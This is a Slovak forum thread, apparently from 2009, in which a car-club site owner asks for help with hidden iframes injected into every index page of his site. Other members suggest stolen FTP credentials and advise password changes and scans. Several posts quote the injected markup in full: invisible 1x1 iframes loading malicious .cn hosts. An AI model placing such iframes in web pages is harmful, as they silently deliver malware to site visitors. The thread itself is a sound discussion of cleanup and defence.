Stránka: 1 z 1
| [ Príspevkov: 17 ] | |
| Autor | Správa |
|---|
Registrovaný: 20.01.07
Prihlásený: 05.05.25
Príspevky: 401
Témy: 87 | 87 |
co si o tom myslite?
moj fusion web, resp forum: http://fusion.fordclubs.org/forum/index.php
mi asi niekto hackol, alebo nejaky automat? ci co?
opravil som to, na index stranke na konci som nasiel toto:
Kód:
<html><body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola7" width=1 height=1 style="visibility: hidden"></iframe></body></html>
kurwy su to
|
|
Registrovaný: 01.05.05
Príspevky: 13557
Témy: 1483 | 1483
Bydlisko: Bratislava |
Ten kto ma pristup na ftp ma alebo mal virus/trojskeho kona, alebo ma webhosting slabe zabespecenie a niekto vyuzil nejaku chybu a pridal ti to do stranky. Cize v prvom rade skontroluj nejakym av pocitac/e kde mas vytvoreny pristup, alebo kde si pristupoval na ftp toho fora. Taktiez si zmen heslona ftp..... Popripade este take mensie opatrenie a to ze obsahu na ftp, tym myslim php subory a sablonam nastavis chmod len na citanie, bez zapisu.
_________________
Streacom DA2 | SilverStone Titanium SX800-LTI 800W | ASRock X299E-ITX/ac | Intel Core i9-9980XE & be quiet! Dark Rock TF | Kingston HyperX Impact 64 GB DDR4 2666 MHz | NVIDIA Titan RTX 24 GB | Intel SSD Optane 905P 480 GB NVMe U.2 & Intel SSD 750 1,2 TB NVMe U.2 & Intel SSD 660p 2 TB NVMe M.2 & Seagate BackUp Plus Portable 56 TB USB | 55" 4K OLED Dell Alienware AW5520QF | Ergotron LX Wall Mount Keyboard Arm | Logitech Craft | Logitech G603 | Logitech F710 | Harman Kardon Sabre SB 35 & Sennheiser RS 175 | Microsoft Windows 11 Enterprise | APC Back-UPS BE-850 VA | Lenovo ThinkPad X1 Carbon | SilverStone ML05B Milo | Corsair SF600 SFX 600W | ASRock X99E-ITX/ac | Intel Xeon E5-2683 v4 & NOCTUA NH-L12S | Kingston HyperX Savage 32 GB DDR4 2400 MHz | NVIDIA GeForce GT 710 1 GB | Intel SSD Optane Memory 32 GB NVMe M.2 & Intel SSD 730 240 GB SATA & Samsung SSD 860 1 TB | Ubuntu 24.04 LTS | Dell Wyse 3040 | Intel Atom x5-Z8350 | 2 GB DDR3 1600 MHz | 16 GB eMMC | 24" EIZO FlexScan EV2451 | Alpine Linux + XFCE4 |
|
Registrovaný: 20.01.07
Prihlásený: 05.05.25
Príspevky: 401
Témy: 87 | 87 | |
Registrovaný: 20.01.07
Prihlásený: 05.05.25
Príspevky: 401
Témy: 87 | 87 |
http://fusion.fordclubs.org/ neviete co moze byt s tym? v mozille mi to ani neslo, v IE a opere ano, ale teraz vidim, ze v opere to mrzne, ako keby tram nieco natahovalo ... mozte mi to checknut ?
dole som videl v riadku: Prijimam data z alink.belstom.ru
|
|
Registrovaný: 02.09.07
Prihlásený: 19.01.20
Príspevky: 6373
Témy: 298 | 298
Bydlisko: Žilina |
no nasi vychodny susedia a others mi robia niekedy tiež nervy. Ta stranka mi ide normalne az nato ze pred vsupon nanu ma vyvaruje ze je na zozname infikovanych 
_________________
NTB: Dell Vostro 5470 - Core i5-4200U, GT 740M, 8GB DDR3-1600, Crucial MX100 256GB, 14" 1366x768
Audio: KRK RoKit 5 G2 White, Lexicon Alpha, M-Audio Axiom 25 MKII, AKG Y55
Phone: Samsung Galaxy S8
Vozenie: Alfa Romeo 159 SW 1.9JTDm 110kW - DPF/EGR/SWIRL OFF, BOSE SOUND |
|
Registrovaný: 20.01.07
Prihlásený: 05.05.25
Príspevky: 401
Témy: 87 | 87 |
qpkqkma píše: no nasi vychodny susedia a others mi robia niekedy tiež nervy. Ta stranka mi ide normalne az nato ze pred vsupon nanu ma vyvaruje ze je na zozname infikovanych to som uz riesil s tym googleanalytics, neviem co sa im nepaci ... normalne ma v mozille na web nepustilo, v ie a opere to slo v pohode
|
|
Registrovaný: 20.01.07
Prihlásený: 05.05.25
Príspevky: 401
Témy: 87 | 87 |
toto mi vypisalo, mozte mi to ozrejmit?
Z celkového počtu stránok 9, ktoré sme testovali na stránke počas posledných 90 dní, 3 stránok spôsobilo prevzatie a nainštalovanie škodlivého softvéru bez povolenia používateľa. Spoločnosť Google túto stránku poslednýkrát navštívila 2009-01-11 a podozrivý obsah sa na tejto stránke poslednýkrát našiel 2009-01-11.
Medzi škodlivý softvér patrí 4 exploit(s). Úspešné infikovanie malo za následok v priemere 9 nových procesov v cieľovom zariadení.
|
|
Registrovaný: 20.01.07
Prihlásený: 05.05.25
Príspevky: 401
Témy: 87 | 87 |
no, prehliaavam to a co som nasiel:
Kód: </head>
<body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola7" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://litetoplocatesite.cn/in.cgi?cocacola2" width=1 height=1 style="visibility: hidden"></iframe>
toto sa mi tam zjavilo v kode, neskutocne 
zase ta coca cola
|
|
Registrovaný: 27.07.07
Príspevky: 3948
Témy: 51 | 51
Bydlisko: Bratislava |
kam presne (pred/za aky prvok/tag) ti pridava ten kod, vzdy za body?
_________________
NTB: Acer Aspire 4820TG 14" | CPU: Intel Core i5 2,53 GHz | VGA: ATI Mobility Radeon HD5650 1GB | RAM: 8GB DDR3 1066 MHz | HDD: 1TB SSD WD BLUE |
|
Registrovaný: 20.01.07
Prihlásený: 05.05.25
Príspevky: 401
Témy: 87 | 87 |
kamos pise, ze niekto so zavirenym PC sa napaja na ftp ... ale o nikom neviem ... ja mam preinstalovany notebook teraz
stale presne takto:
Kód: <body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola7" width=1 height=1 style="visibility: hidden"></iframe><iframe src="http://litetoplocatesite.cn/in.cgi?cocacola2" width=1 height=1 style="visibility: hidden"></iframe>
|
|
Registrovaný: 27.07.07
Príspevky: 3948
Témy: 51 | 51
Bydlisko: Bratislava |
skus si dat preventivne za <body enter, aby si mal "ukoncovaci zobacik" na novom riadku, takto aspon zistis, ci ti to nahodu nevyhladava <body>
ak nemas chybu v zdrojakoch, tak si zmen heslo na ftp a nepouzivaj tc, ak ho pouzivas... treba proste skusat, kde moze byt problem...
_________________
NTB: Acer Aspire 4820TG 14" | CPU: Intel Core i5 2,53 GHz | VGA: ATI Mobility Radeon HD5650 1GB | RAM: 8GB DDR3 1066 MHz | HDD: 1TB SSD WD BLUE |
|
Registrovaný: 20.01.07
Prihlásený: 05.05.25
Príspevky: 401
Témy: 87 | 87 |
ono to prehladalo cely fusion web a vsade kde naslo index.html, tak to tam vlozilo ... a mam to tam Xkrat, lebo tam mam rozne galerie, takze tych index.html mam vela, teraz to odstranujem.
|
|
Registrovaný: 27.07.07
Príspevky: 3948
Témy: 51 | 51
Bydlisko: Bratislava |
aha, pred par rokmi sa mi toto iste stalo, a problem bol v ulozenych heslach na ftp v tc...
dalsia faza bola, ze boli zdrojaky v tychto suboroch vymazane... takze si pre istotu vsetko zazalohuj...
_________________
NTB: Acer Aspire 4820TG 14" | CPU: Intel Core i5 2,53 GHz | VGA: ATI Mobility Radeon HD5650 1GB | RAM: 8GB DDR3 1066 MHz | HDD: 1TB SSD WD BLUE |
|
Registrovaný: 20.01.07
Prihlásený: 05.05.25
Príspevky: 401
Témy: 87 | 87 |
no yooo ... sakra tu ... teraz rucne ten kod odstranujem ...
rozmyslam, ze kde je ten virus, mam ESET, aj v robote a nic nehlasi ...
|
|
Registrovaný: 25.01.09
Prihlásený: 25.01.09
Príspevky: 1
Témy: 0 | 0 |
Mne toto svinstvo preniklo do vsetkych mojich saitov, spravujem ich asi 20 a vsade sa to dostalo , naozaj jedine riesenie vycistit vsetky indexy a pomenit FTP heslá
|
|
Registrovaný: 20.01.07
Prihlásený: 05.05.25
Príspevky: 401
Témy: 87 | 87 |
minales píše: Mne toto svinstvo preniklo do vsetkych mojich saitov, spravujem ich asi 20 a vsade sa to dostalo , naozaj jedine riesenie vycistit vsetky indexy a pomenit FTP heslá jj, urcite je to to iste ...
svinstvo, tipujem, ze si to pamata vsetky hesla a ja sa uz nemusim ani na ftp napojit a ono sa to samo napoji ...
|
|
Registrovaný: 27.07.07
Príspevky: 3948
Témy: 51 | 51
Bydlisko: Bratislava |
_________________
NTB: Acer Aspire 4820TG 14" | CPU: Intel Core i5 2,53 GHz | VGA: ATI Mobility Radeon HD5650 1GB | RAM: 8GB DDR3 1066 MHz | HDD: 1TB SSD WD BLUE |
|
Stránka: 1 z 1
| [ Príspevkov: 17 ] | |
|
